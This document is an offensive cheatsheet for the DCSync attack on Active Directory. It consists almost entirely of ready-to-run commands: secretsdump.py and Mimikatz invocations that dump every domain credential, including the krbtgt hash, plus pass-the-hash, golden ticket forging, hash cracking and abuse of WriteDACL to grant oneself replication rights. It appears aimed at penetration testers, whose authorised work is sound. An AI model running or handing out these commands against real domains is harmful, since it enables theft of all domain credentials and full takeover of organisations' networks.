DCSync Cheatsheet
Quick reference for verifying DCSync rights and performing the attack from Linux and Windows.
Verify DCSync Rights
PowerView
$sid = (Convert-NameToSid <USER>)
Get-ObjectAcl "DC=domain,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
Both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All must be AccessAllowed.
BloodHound
Use the pre-built query: “Find Principals with DCSync Rights”
Perform DCSync — Linux (secretsdump.py)
# Full dump: NTLM hashes + Kerberos keys + cleartext passwords
secretsdump.py -outputfile hashes -just-dc DOMAIN/user@DC_IP
# NTLM hashes only
secretsdump.py -outputfile hashes -just-dc-ntlm DOMAIN/user@DC_IP
# Single user
secretsdump.py -just-dc-user administrator DOMAIN/user@DC_IP
# With pass-the-hash
secretsdump.py -just-dc-ntlm -hashes :NTLM_HASH DOMAIN/user@DC_IP
# With password age and account status (for reporting)
secretsdump.py -outputfile hashes -just-dc -pwd-last-set -user-status DOMAIN/user@DC_IP
# Include password history
secretsdump.py -outputfile hashes -just-dc -history DOMAIN/user@DC_IP
Output Files (-just-dc)
| File | Contents |
|---|---|
*.ntds | NTLM hashes |
*.ntds.kerberos | Kerberos keys |
*.ntds.cleartext | Cleartext passwords (reversible encryption accounts) |
Perform DCSync — Windows (Mimikatz)
# Run as user with DCSync rights (if not already)
runas /netonly /user:DOMAIN\user powershell
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\krbtgt
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /all /csv
Find Accounts with Reversible Encryption
# Built-in cmdlet
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
# PowerView
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol
secretsdump.py decrypts these automatically and outputs to *.ntds.cleartext.
Post-DCSync
| Action | Command |
|---|---|
| Pass-the-Hash | crackmapexec smb DC_IP -u administrator -H <NTLM_HASH> |
| Pass-the-Hash (psexec) | psexec.py -hashes :NTLM_HASH DOMAIN/administrator@DC_IP |
| Golden Ticket (Mimikatz) | kerberos::golden /user:administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt |
| Crack hashes | hashcat -m 1000 hashes.ntds /usr/share/wordlists/rockyou.txt |
Grant DCSync Rights (if you have WriteDACL)
# Grant replication rights to a controlled user
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <YOUR_USER> -Rights DCSync
# Perform DCSync, then remove the rights
Remove-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <YOUR_USER> -Rights DCSync